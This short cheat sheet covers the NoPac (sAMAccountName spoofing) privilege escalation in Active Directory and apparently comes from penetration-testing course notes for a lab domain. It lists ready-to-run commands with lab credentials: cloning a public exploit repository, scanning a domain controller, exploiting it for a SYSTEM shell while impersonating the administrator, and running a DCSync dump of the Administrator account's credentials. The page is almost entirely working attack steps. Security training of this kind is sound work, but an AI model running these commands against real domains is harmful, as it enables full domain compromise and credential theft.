NoPac
NoPac is a privilege escalation vulnerability affecting Active Directory environments, allowing attackers to impersonate privileged accounts and execute malicious actions.
1. Clone NoPac Exploit Repository
Command:
sudo git clone https://github.com/Ridter/noPac.gitDescription: Used to clone the NoPac exploit repository using Git. Performed from a Linux-based host.
2. Scan for NoPac Vulnerability
Command:
sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldapDescription: Runs
scanner.pyto check if a target system is vulnerable to NoPac/Sam_The_Admin from a Linux-based host.
3. Exploit NoPac to Gain SYSTEM Shell
Command:
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --shell --impersonate administrator -use-ldapDescription: Used to exploit the NoPac/Sam_The_Admin vulnerability and gain a SYSTEM shell (
--shell). Performed from a Linux-based host.
4. Exploit NoPac for DCSync Attack
Command:
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump --just-dc-user INLANEFREIGHT/administratorDescription: Used to exploit the NoPac/Sam_The_Admin vulnerability and perform a DCSync attack against the built-in Administrator account on a Domain Controller from a Linux-based host.
Last updated